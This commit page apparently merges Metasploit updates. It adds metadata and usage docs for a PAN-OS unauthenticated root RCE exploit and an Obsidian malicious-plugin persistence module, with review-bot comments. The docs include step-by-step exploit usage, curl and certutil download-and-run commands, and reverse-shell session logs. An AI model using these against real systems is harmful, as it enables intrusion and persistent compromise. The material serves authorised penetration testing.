Merge remote-tracking branch 'upstream/master'
certcc-ghbot committed Dec 30, 2024
2 parents 1f3101d + 22c1697 commit b746db5
Showing 7 changed files with 867 additions and 2 deletions.
3 changes: 2 additions & 1 deletion Gemfile.lock
Expand Up @@ -446,7 +446,8 @@ GEM
metasm
rex-core
rex-text
rex-socket (0.1.57)
rex-socket (0.1.58)
dnsruby
rex-core
rex-sslscan (0.1.10)
rex-core
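Review bot: the rex-socket bump from 0.1.57 to 0.1.58 is the only change in this hunk; the dependency lines beneath it (dnsruby, rex-core) are unchanged context. The gemspec that constrains rex-socket is not part of this diff, so confirm the new version still satisfies that constraint and that the lockfile was regenerated by bundler from the published gem rather than hand-edited, since a drift here changes what `bundle install` resolves on every checkout.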
127 changes: 127 additions & 0 deletions db/modules_metadata_base.json
Expand Up @@ -80696,6 +80696,69 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/panos_management_unauth_rce": {
"name": "Palo Alto Networks PAN-OS Management Interface Unauthenticated Remote Code Execution",
"fullname": "exploit/linux/http/panos_management_unauth_rce",
"aliases": [

],
"rank": 600,
"disclosure_date": "2024-11-18",
"type": "exploit",
"author": [
"watchTowr",
"sfewer-r7"
],
"description": "This module exploits an authentication bypass vulnerability (CVE-2024-0012) and a command injection\n vulnerability (CVE-2024-9474) in the PAN-OS management web interface. An unauthenticated attacker can\n execute arbitrary code with root privileges.\n\n The following versions are affected:\n * PAN-OS 11.2 (up to and including 11.2.4-h1)\n * PAN-OS 11.1 (up to and including 11.1.5-h1)\n * PAN-OS 11.0 (up to and including 11.0.6-h1)\n * PAN-OS 10.2 (up to and including 10.2.12-h2)",
"references": [
"CVE-2024-0012",
"CVE-2024-9474",
"URL-https://security.paloaltonetworks.com/CVE-2024-0012",
"URL-https://security.paloaltonetworks.com/CVE-2024-9474",
"URL-https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Default"
],
"mod_time": "2024-12-17 17:47:00 +0000",
"path": "/modules/exploits/linux/http/panos_management_unauth_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/panos_management_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/panos_op_cmd_exec": {
"name": "Palo Alto Networks Authenticated Remote Code Execution",
"fullname": "exploit/linux/http/panos_op_cmd_exec",
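Review bot: the affected-version ceilings in "description" (11.2.4-h1, 11.1.5-h1, 11.0.6-h1, 10.2.12-h2) are duplicated verbatim from the module documentation added in this same commit, and neither copy says which advisory revision they were taken from; db/modules_metadata_base.json is generated from the module source, so this entry should be regenerated rather than edited by hand, and the ceilings checked against the two security.paloaltonetworks.com references listed. Also, "SideEffects" lists only ioc-in-logs even though the module writes payload chunks to WRITABLE_DIR before deleting them; if the deletion step can be skipped (for example when the run aborts after upload), artifacts-on-disk would be the more accurate label.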
Expand Down Expand Up @@ -118923,6 +118986,70 @@

]
},
"exploit_multi/local/obsidian_plugin_persistence": {
"name": "Obsidian Plugin Persistence",
"fullname": "exploit/multi/local/obsidian_plugin_persistence",
"aliases": [

],
"rank": 600,
"disclosure_date": "2022-09-16",
"type": "exploit",
"author": [
"h00die",
"Thomas Byrne"
],
"description": "This module searches for Obsidian vaults for a user, and uploads a malicious\n community plugin to the vault. The vaults must be opened with community\n plugins enabled (NOT restricted mode), but the plugin will be enabled\n automatically.\n\n Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.",
"references": [
"URL-https://docs.obsidian.md/Plugins/Getting+started/Build+a+plugin",
"URL-https://github.com/obsidianmd/obsidian-sample-plugin/tree/master",
"URL-https://forum.obsidian.md/t/can-obsidian-plugins-have-malware/34491",
"URL-https://help.obsidian.md/Extending+Obsidian/Plugin+security",
"URL-https://thomas-byrne.co.uk/research/obsidian-malicious-plugins/obsidian-research/"
],
"platform": "Linux,OSX,Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": [

],
"autofilter_services": [

],
"targets": [
"Auto",
"Linux",
"OSX",
"Windows"
],
"mod_time": "2024-12-14 17:38:29 +0000",
"path": "/modules/exploits/multi/local/obsidian_plugin_persistence.rb",
"is_install_path": true,
"ref_name": "multi/local/obsidian_plugin_persistence",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": [

]
},
"exploit_multi/local/vagrant_synced_folder_vagrantfile_breakout": {
"name": "Vagrant Synced Folder Vagrantfile Breakout",
"fullname": "exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout",
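Review bot: "SideEffects" declares artifacts-on-disk and config-changes (main.js and manifest.json under .obsidian/plugins/<NAME>/ plus an edited community-plugins list), yet "needs_cleanup" is null, so nothing in the module undoes the persistence after a test run; a cleanup path that removes the plugin directory and the list entry would be expected for a module marked repeatable-session. Separately, "targets" includes OSX while the description says it was tested only on Kali, Ubuntu 22.04 and Windows 10, so either the OSX target should be exercised or the description should state that it is untested.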
2 changes: 1 addition & 1 deletion docs/Gemfile.lock
Expand Up @@ -76,7 +76,7 @@ GEM
rb-fsevent (0.11.2)
rb-inotify (0.11.1)
ffi (~> 1.0)
rexml (3.3.9)
rexml (3.4.0)
rouge (4.5.1)
safe_yaml (1.0.5)
sassc (2.4.0)
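Review bot: the rexml bump from 3.3.9 to 3.4.0 touches only docs/Gemfile.lock; the framework's Gemfile.lock is also changed in this commit, but its rexml line is not in the hunk shown, so check that the two lockfiles do not now pin different rexml versions. rexml is an XML parser, so the 3.4.0 release notes should be read for parsing-behaviour changes rather than treating this as a routine minor bump.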
@@ -0,0 +1,113 @@
## Vulnerable Application
This module exploits an authentication bypass vulnerability (CVE-2024-0012) and a command injection
vulnerability (CVE-2024-9474) in the PAN-OS management web interface. An unauthenticated attacker can
execute arbitrary code with root privileges.

The following versions are affected:
* PAN-OS 11.2 (up to and including 11.2.4-h1)
* PAN-OS 11.1 (up to and including 11.1.5-h1)
* PAN-OS 11.0 (up to and including 11.0.6-h1)
* PAN-OS 10.2 (up to and including 10.2.12-h2)

## Testing
Install a new PAN-OS instance as a VM in VMWare, by downloading an OVA for a vulnerable version, for example
`PA-VM-ESX-11.1.4.ova`. Install this OVA in VMWare Workstation and boot the device. The first ethernet adapter
will be assigned an IP address via DHCP. This is the IP address of the management interface. You can complete setup
by visiting `https://MANAGEMENT_IP/` in your browser. You do not need to license the target VM in order to successfully
run the exploit against the target. The default user is `admin` with a password of `admin`, and you will be instructed
to change this upon logging in for the first time.

The exploit has been tested against PAN-OS `10.2.8` and `11.1.4`, with the
payloads `cmd/linux/http/x64/meterpreter_reverse_tcp`, `md/linux/http/x64/meterpreter/reverse_tcp`,
and `cmd/unix/reverse_bash`.

## Verification Steps

1. Start msfconsole
2. `use exploit/linux/http/panos_management_unauth_rce`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
5. `set LHOST eth0`
5. `set LPORT 4444`
6. `check`
7. `exploit`

## Options

### WRITABLE_DIR
The full path of a writable directory on the target. By default it will be `/var/tmp`. The exploit will write the
payload as a series of chunks to this location, before executing the payload. The written artifacts are then deleted.

## Scenarios

### Default

```
msf6 exploit(linux/http/panos_management_unauth_rce) > show options
Module options (exploit/linux/http/panos_management_unauth_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.100 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
WRITABLE_DIR /var/tmp yes The full path of a writable directory on the target.
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME pHLZiKRnmfR no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /var/tmp yes Remote writable dir to store payload; cannot contain spaces
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Default
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/panos_management_unauth_rce) > check
[+] 192.168.86.100:443 - The target is vulnerable.
msf6 exploit(linux/http/panos_management_unauth_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Uploading payload chunk 1 of 7...
[*] Uploading payload chunk 2 of 7...
[*] Uploading payload chunk 3 of 7...
[*] Uploading payload chunk 4 of 7...
[*] Uploading payload chunk 5 of 7...
[*] Uploading payload chunk 6 of 7...
[*] Uploading payload chunk 7 of 7...
[*] Amalgamating payload chunks...
[*] Executing payload...
[*] Sending stage (3045380 bytes) to 192.168.86.100
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.100:54266) at 2024-11-21 16:35:38 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.86.100
OS : Red Hat (Linux 4.18.0-240.1.1.28.pan.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
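Review bot: the payload name on the "Testing" line `md/linux/http/x64/meterpreter/reverse_tcp` is missing its leading `c` (should be `cmd/linux/http/x64/meterpreter/reverse_tcp`), and the verification steps number both `set LHOST eth0` and `set LPORT 4444` as step 5, so the list should be renumbered 1 to 8. Two smaller points: `set RHOST <TARGET_IP_ADDRESS>` works as an alias but the option shown by `show options` is RHOSTS, and the WRITABLE_DIR section says the written artifacts are deleted, which is true of the module's chunk files but not of the fetched binary when FETCH_DELETE is left at its default of false, as in the scenario output; a sentence pointing testers at FETCH_DELETE would avoid leaving a stray executable in /var/tmp on the target.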
@@ -0,0 +1,124 @@
## Vulnerable Application

This module searches for Obsidian vaults for a user, and uploads a malicious
community plugin to the vault. The vaults must be opened with community
plugins enabled (NOT restricted mode), but the plugin will be enabled
automatically.

Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.

### Debugging

To open the console (similar to chrome), use `ctr+shift+i`.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Get a user shell on the target
4. Do: `use multi/local/obsidian_plugin_persistence`
5. Do: Select a shell which will work on your target OS
6. Do: `run`
7. You should get a shell when the target user opens the vault without restricted mode.

## Options

### NAME

Name of the plugin. Defaults to being randomly generated.

### USER

The user to target. Defaults the user the shell was obtained under.

### CONFIG

Config file location on target. Defaults to empty which will search the default locations.

## Scenarios

### Version and OS

Get a user shell.

```
msf6 exploit(multi/script/web_delivery) > use exploit/multi/local/obsidian_plugin_persistence
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/local/obsidian_plugin_persistence) > set session 1
session => 1
msf6 exploit(multi/local/obsidian_plugin_persistence) > set verbose true
verbose => true
msf6 exploit(multi/local/obsidian_plugin_persistence) > exploit
[*] Command to run on remote host: curl -so ./HvxtaAdZVc http://1.1.1.1:8080/aZRe4yWUN3U2-lDtdsaGlA; chmod +x ./HvxtaAdZVc; ./HvxtaAdZVc &
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /aZRe4yWUN3U2-lDtdsaGlA
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using plugin name: xQem
[*] Target User: ubuntu
[*] Found user obsidian file: /home/ubuntu/.config/obsidian/obsidian.json
[+] Found open vault 83ca6e5734f5dfc4: /home/ubuntu/Documents/test
[*] Uploading plugin to vault /home/ubuntu/Documents/test
[*] Uploading: /home/ubuntu/Documents/test/.obsidian/plugins/xQem/main.js
[*] Uploading: /home/ubuntu/Documents/test/.obsidian/plugins/xQem/manifest.json
[*] Found 1 enabled community plugins (sX2sv4)
[*] adding xQem to the enabled community plugins list
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Client 2.2.2.2 requested /aZRe4yWUN3U2-lDtdsaGlA
[*] Sending payload to 2.2.2.2 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49192) at 2024-12-05 10:19:32 -0500
meterpreter > getuid
Server username: ubuntu
meterpreter > sysinfo
Computer : 2.2.2.2
OS : Ubuntu 22.04 (Linux 5.15.0-60-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```

### Obsidian 1.7.7 on Windows 10

```
msf6 exploit(multi/local/obsidian_plugin_persistence) > rexploit
[*] Reloading module...
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/bXCLrS0dWKPwEfygT3FJNA %TEMP%\FDTcKUuwF.exe & start /B %TEMP%\FDTcKUuwF.exe
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /bXCLrS0dWKPwEfygT3FJNA
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using plugin name: pPq0K
[*] Target User: h00die
[*] Found user obsidian file: C:\Users\h00die\AppData\Roaming\obsidian\obsidian.json
[+] Found open vault 69172dadc065de73: C:\Users\h00die\Documents\vault
[*] Uploading plugin to vault C:\Users\h00die\Documents\vault
[*] Uploading: C:\Users\h00die\Documents\vault/.obsidian/plugins/pPq0K/main.js
[*] Uploading: C:\Users\h00die\Documents\vault/.obsidian/plugins/pPq0K/manifest.json
[*] Found 0 enabled community plugins ()
[*] adding pPq0K to the enabled community plugins list
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Client 3.3.3.3 requested /bXCLrS0dWKPwEfygT3FJNA
[*] Sending payload to 3.3.3.3 (Microsoft-CryptoAPI/10.0)
[*] Client 3.3.3.3 requested /bXCLrS0dWKPwEfygT3FJNA
[*] Sending payload to 3.3.3.3 (CertUtil URL Agent)
[*] Meterpreter session 7 opened (1.1.1.1:4444 -> 3.3.3.3:51369) at 2024-12-05 09:24:24 -0500
meterpreter > getuid
Server username: DESKTOP-3ASD0R4\h00die
meterpreter > sysinfo
Computer : DESKTOP-3ASD0R4
OS : Windows 10 (10.0 Build 19044).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
```
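Review bot: the Windows scenario output shows mixed separators in the plugin path (`C:\Users\h00die\Documents\vault/.obsidian/plugins/pPq0K/main.js`), which means the module joins the vault path and the `.obsidian/plugins/...` suffix with a hard-coded `/` rather than the target's separator; it evidently works, but the path should be built with the platform separator so it matches what Obsidian itself writes. Docs nits in the same hunk: `ctr+shift+i` should read `ctrl+shift+i`; "Defaults the user the shell was obtained under" is missing "to"; the first scenario heading "### Version and OS" is a template placeholder and should name the Ubuntu 22.04 run it shows; and since the plugin only executes when the vault is opened outside restricted mode, the verification steps should say plainly that the session is user-triggered and may not appear until the target next opens the vault.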